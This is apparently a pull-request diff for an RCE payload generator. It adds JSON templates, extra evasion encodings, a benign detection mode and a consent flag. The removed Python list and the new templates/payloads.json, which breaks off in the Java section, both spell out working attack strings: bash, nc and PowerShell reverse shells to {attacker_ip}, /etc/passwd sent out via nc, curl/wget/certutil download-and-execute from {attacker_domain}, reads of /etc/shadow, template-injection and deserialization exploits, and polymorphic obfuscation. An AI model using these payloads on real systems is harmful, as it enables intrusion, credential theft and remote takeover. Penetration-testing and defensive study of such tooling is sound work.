### PR TITLE
feat: add detection mode and modular payload templates

### DIFF
--- a/README.md
+++ b/README.md
@@ -4,11 +4,13 @@ RCEPayloadGen is a comprehensive Remote Code Execution payload generator designe
 
 ## Features
 
-- **Multi-Environment Support**: Generate payloads for Unix, Windows, Node.js, Python, PHP, Java, .NET, Ruby, Perl, Go, and JavaScript environments
+- **Multi-Environment Support**: Generate payloads for Unix, Windows, Node.js, Python, PHP, Java, .NET, Ruby, Perl, Go, JavaScript, containerized Docker workloads, and Kubernetes clusters
 - **Context-Aware**: Creates payloads for different injection contexts (HTML, JavaScript, SQL, etc.)
 - **Sink-Specific Payloads**: Detailed granularity for code execution sinks, including OS commands, template engines (SSTI), and language-specific execution methods with automatic constraint handling (e.g., escaping forbidden characters, adding quotes)
-- **Advanced Encoding**: Multiple encoding methods including Base64, Hex, ROT13, URL encoding, and more
+- **Advanced Encoding**: Multi-stage encoding, polymorphic mutations, Base64, Hex, ROT13, URL encoding, and more for evasion research
+- **Modular Templates**: Payload bases are stored in editable JSON/YAML templates so teams can extend coverage without touching Python source code
 - **Customizable**: Fine-tune payload generation with various command-line options
+- **Detection-Friendly Mode**: Quickly produce benign canary payloads for safe scanning with `--detection-only`
 - **No Duplicates**: Intelligent duplicate detection to avoid redundant payloads
 - **Production-Ready**: Robust error handling, logging, and performance optimization
 
@@ -31,9 +33,9 @@ python rce_payload_gen.py [OPTIONS]
 
 ### Basic Examples
 
-Generate all payloads with default settings:
+Generate all payloads with default settings (requires exploitation consent acknowledgement):
 ```bash
-python rce_payload_gen.py
+python rce_payload_gen.py --acknowledge-consent
 ```
 
 Generate only Unix reverse shells with base64 encoding:
@@ -43,12 +45,17 @@ python rce_payload_gen.py --categories reverse_shells --environments unix --enco
 
 Generate up to 1000 payloads for PHP contexts:
 ```bash
-python rce_payload_gen.py --contexts php --max-payloads 1000
+python rce_payload_gen.py --contexts php --max-payloads 1000 --acknowledge-consent
 ```
 
 Use custom attacker IP and domain:
 ```bash
-python rce_payload_gen.py --attacker-ip 10.0.0.1 --attacker-domain evil.com
+python rce_payload_gen.py --attacker-ip 10.0.0.1 --attacker-domain evil.com --acknowledge-consent
+```
+
+Run in safe detection mode with benign payloads:
+```bash
+python rce_payload_gen.py --detection-only
 ```
 
 ### Full Options
@@ -63,6 +70,9 @@ python rce_payload_gen.py --attacker-ip 10.0.0.1 --attacker-domain evil.com
 | `--categories` | Categories to generate (space-separated) | All categories |
 | `--encodings` | Encoding methods to apply (space-separated) | All encodings |
 | `--environments` | Environments to generate (space-separated) | All environments |
+| `--template-file` | Path to a JSON/YAML template bundle | `templates/payloads.json` |
+| `--detection-only` | Generate benign payloads for validation scans | Disabled |
+| `--acknowledge-consent` | Required confirmation before creating exploitation payloads | Disabled |
 
 ### Available Contexts
 
@@ -97,6 +107,8 @@ python rce_payload_gen.py --attacker-ip 10.0.0.1 --attacker-domain evil.com
 - `perl` - Perl environment
 - `go` - Go environment
 - `javascript` - JavaScript environment (legacy)
+- `docker` - Container escape research against Docker runtimes
+- `kubernetes` - Payloads targeting Kubernetes workloads and control planes
 
 ### Available Encoding Methods
 
@@ -108,6 +120,11 @@ python rce_payload_gen.py --attacker-ip 10.0.0.1 --attacker-domain evil.com
 - `rot13` - ROT13 encoding
 - `random_case` - Random case variation
 - `insert_special_chars` - Insert special characters
+- `base64_then_url` - Multi-stage base64 followed by URL encoding
+- `rot13_then_base64` - ROT13 transform with a base64 wrapper
+- `double_base64` - Nested base64 encoding layers
+- `xor_polymorphic` - XOR key obfuscation with key disclosure for analysis
+- `chunk_shuffle` - Chunk-level permutation for polymorphic variants
 
 ## Payload Types
 
@@ -119,6 +136,7 @@ RCEPayloadGen generates payloads across multiple categories:
 4. **Code Execution**: Language-specific code execution patterns with sink-level details and constraint adjustments
 5. **Download & Execute**: Payloads that download and execute remote code
 6. **Reverse Shells**: Comprehensive reverse shell payloads for various environments
+7. **Container Escape Research**: Docker and Kubernetes oriented payloads to validate hardening of container platforms
 
 ## Detailed Code Execution Sinks
 
@@ -160,9 +178,12 @@ For the `code_execution` category, payloads are generated at a sink-specific lev
 ### JavaScript (`javascript`)
 - Legacy executions using require and eval
 
-## Logging
+## Logging & Ethical Controls
 
-The tool generates detailed logs in `rce_generator.log` with timestamps and severity levels to help with debugging and monitoring the generation process.
+- Detailed execution logs are stored in `rce_generator.log` with timestamps and severity levels for monitoring.
+- Exploitation payload generation writes audit entries to `exploit_audit.log` with a unique watermark token.
+- Detection mode produces safe canary payloads suitable for authorized scanning and validation activities.
+- Exploitation payloads include embedded watermark comments/commands referencing the audit token to discourage misuse.
 
 ## Ethical Use
 

--- a/rce_payload_gen.py
+++ b/rce_payload_gen.py
@@ -1,13 +1,15 @@
 import argparse
-import urllib.parse
 import base64
+import codecs
+import json
+import logging
 import random
 import string
-import codecs
-import logging
 import sys
-from typing import Dict, List, Set, Callable, Any, Iterator
+import urllib.parse
+from datetime import datetime, timezone
 from pathlib import Path
+from typing import Any, Dict, Iterator, List, Optional, Set
 
 # Configure logging
 logging.basicConfig(
@@ -21,11 +23,17 @@ logging.basicConfig(
 logger = logging.getLogger(__name__)
 
 class RCEPayloadGenerator:
-    def __init__(self, attacker_ip: str = "192.168.1.100", attacker_domain: str = "attacker.com"):
+    def __init__(
+        self,
+        attacker_ip: str = "192.168.1.100",
+        attacker_domain: str = "attacker.com",
+        template_path: Optional[Path] = None,
+    ):
         self.attacker_ip = attacker_ip
         self.attacker_domain = attacker_domain
+        self.template_path = template_path or Path(__file__).parent / "templates" / "payloads.json"
         self.setup_components()
-        
+
     def setup_components(self):
         """Initialize all payload components"""
         # Context-specific wrappers for different injection points
@@ -46,6 +54,8 @@ class RCEPayloadGenerator:
             "windows": ["&", "|", "%26", "%7C", "`|", "`&"],
             "php": [".", ";"],
             "javascript": [";", ","],
+            "docker": ["; ", "&& ", "| "],
+            "kubernetes": ["; ", "&& "],
         }
 
         # Sink-specific constraints (forbidden chars, requirements)
@@ -63,13 +73,18 @@ class RCEPayloadGenerator:
             "python_jinja2_ssti": {"forbidden_chars": ["{{", "}}"], "requires_quotes": False},
             # PHP sinks
             "php_exec_system": {"forbidden_chars": [";", "|"], "requires_quotes": True},
+            "php_deserialize": {"forbidden_chars": [], "requires_quotes": False},
+            "php_eval": {"forbidden_chars": [], "requires_quotes": False},
             # Java sinks
             "java_runtime_exec": {"forbidden_chars": [";", "|"], "requires_quotes": True},
             "java_freemarker_ssti": {"forbidden_chars": ["${", "}"], "requires_quotes": False},
             "java_velocity_ssti": {"forbidden_chars": ["#", "$"], "requires_quotes": False},
             "java_thymeleaf_ssti": {"forbidden_chars": ["[[", "]]"], "requires_quotes": False},
+            "java_deserialization": {"forbidden_chars": [], "requires_quotes": False},
+            "java_expression": {"forbidden_chars": [], "requires_quotes": False},
             # .NET sinks
             "dotnet_process_start": {"forbidden_chars": ["&", "|"], "requires_quotes": True},
+            "dotnet_deserialize": {"forbidden_chars": [], "requires_quotes": False},
             # Ruby sinks
             "ruby_kernel_system": {"forbidden_chars": [";", "|"], "requires_quotes": True},
             "ruby_erb_ssti": {"forbidden_chars": ["<%", "%>"], "requires_quotes": False},
@@ -77,158 +92,14 @@ class RCEPayloadGenerator:
             "perl_system_backticks": {"forbidden_chars": [";", "|"], "requires_quotes": True},
             # Go sinks
             "go_os_exec": {"forbidden_chars": [";", "|"], "requires_quotes": True},
+            # Node sinks
+            "nodejs_vm_eval": {"forbidden_chars": [], "requires_quotes": False},
+            "nodejs_deserialization": {"forbidden_chars": [], "requires_quotes": False},
         }
 
-        # Common payloads by category, now with sink-level granularity in code_execution
-        self.payload_categories = {
-            "basic_enum": {
-                "unix": ["id", "whoami", "uname -a", "pwd", "ls -la", "ps aux"],
-                "windows": ["whoami", "ver", "dir", "tasklist", "ipconfig"],
-            },
-            "file_operations": {
-                "unix": [
-                    "cat /etc/passwd", "cat /etc/shadow", 
-                    "head -n 10 /etc/passwd", "tail -f /var/log/syslog",
-                    "find / -name '*.conf' -type f 2>/dev/null"
-                ],
-                "windows": [
-                    "type C:\\Windows\\System32\\drivers\\etc\\hosts",
-                    "dir C:\\Windows\\System32\\drivers\\etc",
-                    "dir C:\\Users"
-                ],
-            },
-            "network_operations": {
-                "unix": ["ifconfig", "netstat -tulpn", "arp -a", "ping -c 4 127.0.0.1"],
-                "windows": ["ipconfig /all", "netstat -ano", "arp -a", "ping -n 4 127.0.0.1"],
-            },
-            "code_execution": {
-                "nodejs": {
-                    "child_process_exec": [
-                        "require('child_process').exec('whoami')",
-                        "require('child_process').exec('cat /etc/passwd | nc {attacker_ip} 443')",
-                        "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"')",
-                    ],
-                    "pug_ssti": [
-                        "= 7 * 7",
-                        "= require('child_process').exec('whoami')",
-                    ],
-                    "ejs_ssti": [
-                        "<%= 7 * 7 %>",
-                        "<%= require('child_process').exec('whoami') %>",
-                    ],
-                    "handlebars_ssti": [
-                        "{{7 * 7}}",
-                        "{{lookup (lookup (lookup (lookup __proto__ 'constructor') 'constructor') 'call') 'whoami'}}",  # Simplified example
-                    ],
-                },
-                "python": {
-                    "os_system": [
-                        "os.system('whoami')",
-                        "os.system('cat /etc/passwd')",
-                        "os.system('bash -i >& /dev/tcp/{attacker_ip}/443 0>&1')",
-                    ],
-                    "subprocess": [
-                        "subprocess.call(['whoami'], shell=True)",
-                        "subprocess.Popen('cat /etc/passwd', shell=True).communicate()",
-                    ],
-                    "jinja2_ssti": [
-                        "{{7*7}}",
-                        "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
-                        "{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}",
-                        "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}",
-                    ],
-                },
-                "php": {
-                    "exec_system": [
-                        "system('whoami')",
-                        "exec('whoami')",
-                        "shell_exec('whoami')",
-                        "passthru('whoami')",
-                        "eval('system(\"whoami\")')",
-                        "preg_replace('/.*/e','system(\"whoami\")','')",  # Legacy /e modifier
-                    ],
-                },
-                "java": {
-                    "runtime_exec": [
-                        "Runtime.getRuntime().exec(\"whoami\")",
-                        "new ProcessBuilder(\"whoami\").start()",
-                        "Runtime.getRuntime().exec(\"cat /etc/passwd\")",
-                    ],
-                    "freemarker_ssti": [
-                        "${7*7}",
-                        "${'freemarker.template.utility.Execute'?new()('id')}",
-                        "<#assign ex = 'freemarker.template.utility.Execute'?new()>${ ex('id')}",
-                    ],
-                    "velocity_ssti": [
-                        "#set($x='') $x",
-                        "#set($rt=$x.class.forName('java.lang.Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) #set($ex=$rt.getRuntime().exec('id')) $d=$ex.getInputStream() $d=$chr.toChars($d.readBytes($d.available())) $out=$str.valueOf($d) $out",
-                    ],
-                    "thymeleaf_ssti": [
-                        "[[${7*7}]]",
-                        "[[${T(java.lang.Runtime).getRuntime().exec('id')}]]",
-                    ],
-                },
-                "dotnet": {
-                    "process_start": [
-                        "Process.Start(\"whoami.exe\")",
-                        "Process.Start(\"cmd.exe\", \"/c whoami\")",
-                        "new Process { StartInfo = new ProcessStartInfo { FileName = \"cmd.exe\", Arguments = \"/c whoami\" } }.Start()",
-                    ],
-                },
-                "ruby": {
-                    "kernel_system": [
-                        "system('whoami')",
-                        "`whoami`",
-                        "Kernel.system('whoami')",
-                        "Kernel.exec('whoami')",
-                    ],
-                    "erb_ssti": [
-                        "<%= 7 * 7 %>",
-                        "<%= `whoami` %>",
-                        "<%= File.open('/etc/passwd').read %>",
-                    ],
-                },
-                "perl": {
-                    "system_backticks": [
-                        "system('whoami')",
-                        "`whoami`",
-                        "exec('whoami')",
-                    ],
-                },
-                "go": {
-                    "os_exec": [
-                        "exec.Command(\"whoami\").Output()",
-                        "exec.Command(\"bash\", \"-c\", \"whoami\").Output()",
-                        "exec.Command(\"cat\", \"/etc/passwd\").Output()",
-                    ],
-                },
-                "javascript": [  # Legacy, kept for compatibility
-                    "require('child_process').exec('whoami')",
-                    "eval(\"require('child_process').exec('whoami')\")"
-                ],
-            },
-            "download_execute": {
-                "unix": [
-                    "curl http://{attacker_domain}/shell.sh | sh",
-                    "wget http://{attacker_domain}/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh",
-                    "python3 -c \"import urllib.request; exec(urllib.request.urlopen('http://{attacker_domain}/shell.py').read())\""
-                ],
-                "windows": [
-                    "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://{attacker_domain}/shell.ps1')\"",
-                    "certutil -urlcache -f http://{attacker_domain}/shell.exe shell.exe && shell.exe"
-                ],
-            },
-            "reverse_shells": {
-                "unix": [
-                    "bash -i >& /dev/tcp/{attacker_ip}/443 0>&1",
-                    "nc -e /bin/sh {attacker_ip} 443",
-                    "python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"{attacker_ip}\",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'"
-                ],
-                "windows": [
-                    "powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker_ip}',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()\""
-                ],
-            },
-        }
+        self.payload_categories: Dict[str, Any] = {}
+        self.detection_payloads: Dict[str, List[str]] = {}
+        self._load_template_payloads()
 
         # Encoding and obfuscation techniques
         self.encoding_methods = {
@@ -240,7 +111,42 @@ class RCEPayloadGenerator:
             "rot13": lambda x: codecs.encode(x, 'rot13'),
             "random_case": lambda x: ''.join(random.choice([c.upper(), c.lower()]) for c in x),
             "insert_special_chars": lambda x: self.insert_special_chars(x, 0.1),
+            "base64_then_url": lambda x: urllib.parse.quote(base64.b64encode(x.encode()).decode()),
+            "rot13_then_base64": lambda x: base64.b64encode(codecs.encode(x, 'rot13').encode()).decode(),
+            "double_base64": lambda x: base64.b64encode(base64.b64encode(x.encode())).decode(),
+            "xor_polymorphic": self.xor_polymorphic_encode,
+            "chunk_shuffle": self.chunk_shuffle_encode,
         }
+
+    def _load_template_payloads(self) -> None:
+        """Load payload templates from JSON/YAML files."""
+        if not self.template_path.exists():
+            logger.warning("Template file %s not found. Using fallback templates.", self.template_path)
+            self.payload_categories = {}
+            self.detection_payloads = {}
+            return
+
+        try:
+            with open(self.template_path, "r", encoding="utf-8") as template_file:
+                content = template_file.read()
+
+            if self.template_path.suffix in {".yml", ".yaml"}:
+                try:
+                    import yaml  # type: ignore
+
+                    data = yaml.safe_load(content)
+                except Exception as exc:  # pragma: no cover - optional dependency
+                    logger.error("Failed to parse YAML template %s: %s", self.template_path, exc)
+                    raise
+            else:
+                data = json.loads(content)
+
+            self.payload_categories = data.get("payload_categories", {})
+            self.detection_payloads = data.get("detection_payloads", {})
+        except Exception as exc:
+            logger.error("Unable to load payload templates: %s", exc)
+            self.payload_categories = {}
+            self.detection_payloads = {}
 
     def insert_special_chars(self, s: str, frequency: float = 0.1) -> str:
         """Insert special characters randomly"""
@@ -251,6 +157,22 @@ class RCEPayloadGenerator:
                 result.append(random.choice(special_chars))
             result.append(char)
         return ''.join(result)
+
+    def xor_polymorphic_encode(self, payload: str) -> str:
+        """Apply a simple XOR obfuscation with a random key and annotate the output."""
+        key = random.randint(1, 255)
+        encoded = ''.join(f"{ord(char) ^ key:02x}" for char in payload)
+        return f"XOR({key}):{encoded}"
+
+    def chunk_shuffle_encode(self, payload: str, chunk_size: int = 3) -> str:
+        """Split the payload into chunks and shuffle them to create polymorphic variants."""
+        if len(payload) <= chunk_size:
+            return payload
+
+        chunks = [payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size)]
+        random.shuffle(chunks)
+        shuffled = ''.join(chunks)
+        return f"shuffle::{shuffled}"
 
     def apply_constraints(self, payload: str, sink: str) -> str:
         """Apply sink-specific constraints to payload"""
@@ -268,83 +190,202 @@ class RCEPayloadGenerator:
         
         if constraints.get('requires_quotes', False):
             payload = f'"{payload}"'
-        
+
         return payload
 
-    def generate_payloads(self, selected_contexts: List[str] = None, 
-                         selected_categories: List[str] = None,
-                         selected_encodings: List[str] = None,
-                         selected_environments: List[str] = None) -> Iterator[str]:
-        """
-        Generate RCE payloads based on selected options
-        
-        Args:
-            selected_contexts: List of contexts to include (default: all)
-            selected_categories: List of categories to include (default: all)
-            selected_encodings: List of encoding methods to apply (default: all)
-            selected_environments: List of environments to include (default: all)
-            
-        Yields:
-            Generated payload strings
-        """
+    def apply_watermark(self, payload: str, env: str, context_name: str, marker: str) -> str:
+        """Embed a watermark comment or command into generated payloads where feasible."""
+        watermark_token = f"RCEPayloadGen-ID:{marker}"
+
+        if context_name == "attribute":
+            logger.debug("Skipping watermark injection for attribute context due to quoting constraints.")
+            return payload
+
+        if env == "windows":
+            return f"{payload} & REM {watermark_token}"
+        if env in {"unix", "docker", "kubernetes"}:
+            return f"{payload} ;# {watermark_token}"
+        if env == "php":
+            return f"{payload};/* {watermark_token} */"
+        if env in {"python", "ruby", "perl"}:
+            return f"{payload}  # {watermark_token}"
+        if env in {"nodejs", "javascript"}:
+            return f"{payload} // {watermark_token}"
+        if env in {"java", "dotnet", "go"}:
+            return f"{payload} /* {watermark_token} */"
+
+        return f"{payload} /* {watermark_token} */"
+
+    def generate_payloads(
+        self,
+        selected_contexts: List[str] = None,
+        selected_categories: List[str] = None,
+        selected_encodings: List[str] = None,
+        selected_environments: List[str] = None,
+        mode: str = "exploit",
+        watermark_token: Optional[str] = None,
+    ) -> Iterator[str]:
+        """Generate payloads for detection or exploitation modes."""
         generated_payloads: Set[str] = set()
-        
-        # Use all if none specified
+
+        if mode == "detection":
+            yield from self._generate_detection_payloads(
+                selected_contexts,
+                selected_encodings,
+                selected_environments,
+                generated_payloads,
+            )
+            return
+
         contexts = selected_contexts if selected_contexts else list(self.contexts.keys())
         categories = selected_categories if selected_categories else list(self.payload_categories.keys())
         encodings = selected_encodings if selected_encodings else list(self.encoding_methods.keys())
-        environments = selected_environments if selected_environments else ["unix", "windows", "nodejs", "python", "php", "java", "dotnet", "ruby", "perl", "go", "javascript"]
-        
-        logger.info(f"Generating payloads for contexts: {contexts}, categories: {categories}, "
-                   f"encodings: {encodings}, environments: {environments}")
-        
+        environments = selected_environments if selected_environments else [
+            "unix",
+            "windows",
+            "nodejs",
+            "python",
+            "php",
+            "java",
+            "dotnet",
+            "ruby",
+            "perl",
+            "go",
+            "javascript",
+            "docker",
+            "kubernetes",
+        ]
+
+        logger.info(
+            "Generating payloads for contexts: %s, categories: %s, encodings: %s, environments: %s",
+            contexts,
+            categories,
+            encodings,
+            environments,
+        )
+
         for context_name in contexts:
             if context_name not in self.contexts:
-                logger.warning(f"Unknown context: {context_name}")
+                logger.warning("Unknown context: %s", context_name)
                 continue
-                
+
             context = self.contexts[context_name]
-            
+
             for category_name in categories:
                 if category_name not in self.payload_categories:
-                    logger.warning(f"Unknown category: {category_name}")
+                    logger.warning("Unknown category: %s", category_name)
                     continue
-                    
+
                 category = self.payload_categories[category_name]
-                
+
                 for env in environments:
                     if env not in category:
                         continue
-                    
+
                     env_payloads = category[env]
                     if isinstance(env_payloads, dict):  # For code_execution with sinks
                         for sink, payloads in env_payloads.items():
-                            sink_key = f"{env}_{sink.replace('.', '_')}"  # Normalize sink key for constraints
+                            sink_key = f"{env}_{sink.replace('.', '_')}"
                             for base_payload in payloads:
                                 constrained_payload = self.apply_constraints(base_payload, sink_key)
-                                for wrapped_payload in self._generate_variations(constrained_payload, context, env, encodings, generated_payloads):
+                                for wrapped_payload in self._generate_variations(
+                                    constrained_payload,
+                                    context,
+                                    env,
+                                    encodings,
+                                    generated_payloads,
+                                    context_name,
+                                    watermark_token,
+                                ):
                                     yield wrapped_payload
-                    else:  # For other categories
+                    else:
                         for base_payload in env_payloads:
-                            for wrapped_payload in self._generate_variations(base_payload, context, env, encodings, generated_payloads):
+                            for wrapped_payload in self._generate_variations(
+                                base_payload,
+                                context,
+                                env,
+                                encodings,
+                                generated_payloads,
+                                context_name,
+                                watermark_token,
+                            ):
                                 yield wrapped_payload
 
-    def _generate_variations(self, base_payload: str, context: Dict, env: str, encodings: List[str], generated_payloads: Set[str]) -> Iterator[str]:
+    def _generate_detection_payloads(
+        self,
+        selected_contexts: Optional[List[str]],
+        selected_encodings: Optional[List[str]],
+        selected_environments: Optional[List[str]],
+        generated_payloads: Set[str],
+    ) -> Iterator[str]:
+        contexts = selected_contexts if selected_contexts else list(self.contexts.keys())
+        encodings = selected_encodings if selected_encodings else list(self.encoding_methods.keys())
+        environments = selected_environments if selected_environments else list(self.detection_payloads.keys())
+
+        logger.info(
+            "Generating detection payloads for contexts: %s, encodings: %s, environments: %s",
+            contexts,
+            encodings,
+            environments,
+        )
+
+        for context_name in contexts:
+            if context_name not in self.contexts:
+                logger.warning("Unknown context: %s", context_name)
+                continue
+
+            context = self.contexts[context_name]
+
+            for env in environments:
+                payloads = self.detection_payloads.get(env, [])
+                for base_payload in payloads:
+                    formatted = base_payload.replace("{attacker_ip}", self.attacker_ip)
+                    formatted = formatted.replace("{canary}", self._generate_canary())
+                    for wrapped_payload in self._encode_and_wrap(
+                        formatted,
+                        context,
+                        encodings,
+                        generated_payloads,
+                    ):
+                        yield wrapped_payload
+
+    def _generate_variations(
+        self,
+        base_payload: str,
+        context: Dict[str, str],
+        env: str,
+        encodings: List[str],
+        generated_payloads: Set[str],
+        context_name: str,
+        watermark_token: Optional[str],
+    ) -> Iterator[str]:
         """Helper to generate payload variations with separators and encodings"""
         formatted_payload = base_payload.replace("{attacker_ip}", self.attacker_ip).replace("{attacker_domain}", self.attacker_domain)
-        
+
         # Add with separators
         if env in self.separators:
             for sep in self.separators[env]:
                 full_payload = f"{sep}{formatted_payload}"
+                if watermark_token:
+                    full_payload = self.apply_watermark(full_payload, env, context_name, watermark_token)
                 for wrapped_payload in self._encode_and_wrap(full_payload, context, encodings, generated_payloads):
                     yield wrapped_payload
-        
+
         # Add without separator
-        for wrapped_payload in self._encode_and_wrap(formatted_payload, context, encodings, generated_payloads):
+        base_variant = formatted_payload
+        if watermark_token:
+            base_variant = self.apply_watermark(base_variant, env, context_name, watermark_token)
+
+        for wrapped_payload in self._encode_and_wrap(base_variant, context, encodings, generated_payloads):
             yield wrapped_payload
 
-    def _encode_and_wrap(self, payload: str, context: Dict, encodings: List[str], generated_payloads: Set[str]) -> Iterator[str]:
+    def _encode_and_wrap(
+        self,
+        payload: str,
+        context: Dict[str, str],
+        encodings: List[str],
+        generated_payloads: Set[str],
+    ) -> Iterator[str]:
         """Apply encodings and context wrapping"""
         for enc_name in encodings:
             if enc_name not in self.encoding_methods:
@@ -362,10 +403,13 @@ class RCEPayloadGenerator:
             except Exception as e:
                 logger.error(f"Error encoding payload: {e}")
 
+    def _generate_canary(self) -> str:
+        return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
+
     def save_payloads_to_file(self, file_path: str, max_payloads: int = None, **kwargs) -> int:
         """
         Generate payloads and save them to a file
-        
+
         Args:
             file_path: Path to the output file
             max_payloads: Maximum number of payloads to generate (None for unlimited)
@@ -382,16 +426,27 @@ class RCEPayloadGenerator:
                     count += 1
                     if max_payloads and count >= max_payloads:
                         break
-                        
+
             logger.info(f"Successfully generated {count} payloads to {file_path}")
         except Exception as e:
             logger.error(f"Error writing to file {file_path}: {e}")
-            
+
         return count
+
+    def log_exploitation_usage(self, watermark_token: str, arguments: argparse.Namespace) -> None:
+        audit_path = Path("exploit_audit.log")
+        try:
+            with audit_path.open("a", encoding="utf-8") as audit_file:
+                timestamp = datetime.now(timezone.utc).isoformat()
+                audit_file.write(
+                    f"{timestamp} | token={watermark_token} | ip={self.attacker_ip} | domain={self.attacker_domain} | args={vars(arguments)}\n"
+                )
+        except Exception as exc:
+            logger.error("Unable to log exploitation usage: %s", exc)
 
 def main():
     parser = argparse.ArgumentParser(description="Generate RCE payloads for penetration testing")
-    parser.add_argument("-o", "--output", default="rce_payloads.txt", 
+    parser.add_argument("-o", "--output", default="rce_payloads.txt",
                        help="Output file path (default: rce_payloads.txt)")
     parser.add_argument("--attacker-ip", default="192.168.1.100",
                        help="Attacker IP for reverse shells (default: 192.168.1.100)")
@@ -407,26 +462,46 @@ def main():
                        help="Encoding methods to apply (default: all)")
     parser.add_argument("--environments", nargs="+", default=None,
                        help="Environments to generate (default: all)")
-    
+    parser.add_argument("--template-file", type=str, default=None,
+                        help="Path to a custom payload template file (JSON or YAML)")
+    parser.add_argument("--detection-only", action="store_true",
+                        help="Generate benign payloads for detection and validation")
+    parser.add_argument("--acknowledge-consent", action="store_true",
+                        help="Acknowledge that exploitation payloads will only be used with proper authorization")
+
     args = parser.parse_args()
-    
+
+    template_path = Path(args.template_file) if args.template_file else None
     # Initialize generator
     generator = RCEPayloadGenerator(
         attacker_ip=args.attacker_ip,
-        attacker_domain=args.attacker_domain
+        attacker_domain=args.attacker_domain,
+        template_path=template_path,
     )
-    
-    # Generate and save payloads
+
+    mode = "detection" if args.detection_only else "exploit"
+
+    if mode == "exploit" and not args.acknowledge_consent:
+        print("[!] Exploitation mode requires explicit consent. Re-run with --acknowledge-consent after confirming authorization.")
+        return
+
+    watermark_token = None
+    if mode == "exploit":
+        watermark_token = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
+        generator.log_exploitation_usage(watermark_token, args)
+
     count = generator.save_payloads_to_file(
         file_path=args.output,
         max_payloads=args.max_payloads,
         selected_contexts=args.contexts,
         selected_categories=args.categories,
         selected_encodings=args.encodings,
-        selected_environments=args.environments
+        selected_environments=args.environments,
+        mode=mode,
+        watermark_token=watermark_token,
     )
-    
-    print(f"Generated {count} payloads to {args.output}")
+
+    print(f"Generated {count} payloads to {args.output} in {mode} mode")
 
 if __name__ == "__main__":
     main()

--- a/templates/payloads.json
+++ b/templates/payloads.json
@@ -1,0 +1,251 @@
+{
+    "payload_categories": {
+        "basic_enum": {
+            "unix": [
+                "id",
+                "whoami",
+                "uname -a",
+                "pwd",
+                "ls -la",
+                "ps aux"
+            ],
+            "windows": [
+                "whoami",
+                "ver",
+                "dir",
+                "tasklist",
+                "ipconfig"
+            ]
+        },
+        "file_operations": {
+            "unix": [
+                "cat /etc/passwd",
+                "cat /etc/shadow",
+                "head -n 10 /etc/passwd",
+                "tail -f /var/log/syslog",
+                "find / -name '*.conf' -type f 2>/dev/null"
+            ],
+            "windows": [
+                "type C:\\Windows\\System32\\drivers\\etc\\hosts",
+                "dir C:\\Windows\\System32\\drivers\\etc",
+                "dir C:\\Users"
+            ]
+        },
+        "network_operations": {
+            "unix": [
+                "ifconfig",
+                "netstat -tulpn",
+                "arp -a",
+                "ping -c 4 127.0.0.1"
+            ],
+            "windows": [
+                "ipconfig /all",
+                "netstat -ano",
+                "arp -a",
+                "ping -n 4 127.0.0.1"
+            ]
+        },
+        "code_execution": {
+            "nodejs": {
+                "child_process_exec": [
+                    "require('child_process').exec('whoami')",
+                    "require('child_process').exec('cat /etc/passwd | nc {attacker_ip} 443')",
+                    "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/443 0>&1\"')"
+                ],
+                "pug_ssti": [
+                    "= 7 * 7",
+                    "= require('child_process').exec('whoami')"
+                ],
+                "ejs_ssti": [
+                    "<%= 7 * 7 %>",
+                    "<%= require('child_process').exec('whoami') %>"
+                ],
+                "handlebars_ssti": [
+                    "{{7 * 7}}",
+                    "{{lookup (lookup (lookup (lookup __proto__ 'constructor') 'constructor') 'call') 'whoami'}}"
+                ],
+                "vm_eval": [
+                    "(new (require('vm').Script)(`require('child_process').exec('whoami')`)).runInThisContext()",
+                    "vm.runInNewContext(`require('child_process').exec('curl http://{attacker_domain}/x.sh | sh')`, {}, { timeout: 1000 })"
+                ],
+                "deserialization": [
+                    "const serialize = require('node-serialize'); const payload = \"{\\\"rce\\\": \\\"_$$ND_FUNC$$_function(){require('child_process').exec('id');}()\\\"}\"; serialize.unserialize(payload);"
+                ]
+            },
+            "python": {
+                "os_system": [
+                    "os.system('whoami')",
+                    "os.system('cat /etc/passwd')",
+                    "os.system('bash -i >& /dev/tcp/{attacker_ip}/443 0>&1')"
+                ],
+                "subprocess": [
+                    "subprocess.call(['whoami'], shell=True)",
+                    "subprocess.Popen('cat /etc/passwd', shell=True).communicate()"
+                ],
+                "jinja2_ssti": [
+                    "{{7*7}}",
+                    "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
+                    "{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}",
+                    "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}"
+                ]
+            },
+            "php": {
+                "exec_system": [
+                    "system('whoami')",
+                    "exec('whoami')",
+                    "shell_exec('whoami')",
+                    "passthru('whoami')",
+                    "eval('system(\"whoami\")')",
+                    "preg_replace('/.*/e','system(\"whoami\")','')"
+                ],
+                "eval": [
+                    "assert(\"system('whoami')\");",
+                    "@create_function(\"\", \"system('ls');\");"
+                ],
+                "deserialize": [
+                    "$payload = file_get_contents('php://input'); $object = unserialize($payload);"
+                ]
+            },
+            "java": {
+                "runtime_exec": [
